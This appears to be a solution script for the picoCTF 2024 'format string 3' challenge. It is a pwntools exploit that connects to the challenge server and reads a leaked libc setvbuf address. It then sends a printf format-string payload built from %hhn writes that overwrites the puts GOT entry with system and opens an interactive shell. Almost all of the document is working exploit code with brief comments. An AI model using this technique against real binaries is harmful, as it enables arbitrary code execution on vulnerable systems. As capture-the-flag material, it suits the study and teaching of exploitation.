pico2024 format string 3

#Uses a printf format string vulnerability to change the GOT.PLT entry for puts to point to system instead. from pwn import * r = remote('rhea.picoctf.net',64525) print(r.recvuntil('libc: ')) ## receive the address of setvbuf setvbuf_addr=r.recvline() print(setvbuf_addr) ## split out the second and third bytes (counting from right end) second_byte=(int(setvbuf_addr[:-1],16)//256)%256 print("second_byte is:" + hex(second_byte)) second_diff=second_byte-0xa3 third_byte=(int(setvbuf_addr[:-1],16)//(256*256))%256 print("third_byte is:" + hex(third_byte)) ## to minimize # of bytes, write third byte, then first byte, then second ## bottom bytes are 0xf760 ## third byte should be value of setvbuf's third byte, minus 3 prefix="%03d"%(third_byte-3) # second byte written is least significant # we just want this to change to 0x60, 0x160 is used to make # sure value is positive and extra 0x100 is removed by %256 ## Since %hhn is number of bytes written so far, we subtract that second_amount=(0x160-(third_byte-3))%256 secondfix="%03d"%second_amount ## third byte written is second-least significant ## we want this to be f7+whatever difference we discovered from setvbuf ## We know num bytes written so far is 0x60, so we subtract that third_amount=(0x1f7-0x60+second_diff)%256 thirdfix="%03d"%third_amount ## printf probably uses a 512 byte buffer print(second_amount+third_amount+third_byte-3) if (second_amount+third_amount+third_byte-3 &gt 512): print("Probably gonna fail!") print("%" + prefix + "u%43$hhn%"+secondfix+"u%45$hhn%"+thirdfix+"u%44$hhnYYYY") print(len("%" + prefix + "u%43$hhn%"+secondfix+"u%45$hhn%"+thirdfix+"u%44$hhnYYYY")) #r.sendline("%" + prefix + "u%43$llx%"+secondfix+"u%45$llx%"+thirdfix+"u%44$llxYYYY\x1a\x40\x40\x00\x00\x00\x00\x00\x19\x40\x40\x00\x00\x00\x00\x00\x18\x40\x40\x00\x00\x00\x00\x00") r.sendline("%" + prefix + "u%43$hhn%"+secondfix+"u%45$hhn%"+thirdfix+"u%44$hhnYYYY\x1a\x40\x40\x00\x00\x00\x00\x00\x19\x40\x40\x00\x00\x00\x00\x00\x18\x40\x40\x00\x00\x00\x00\x00") r.interactive()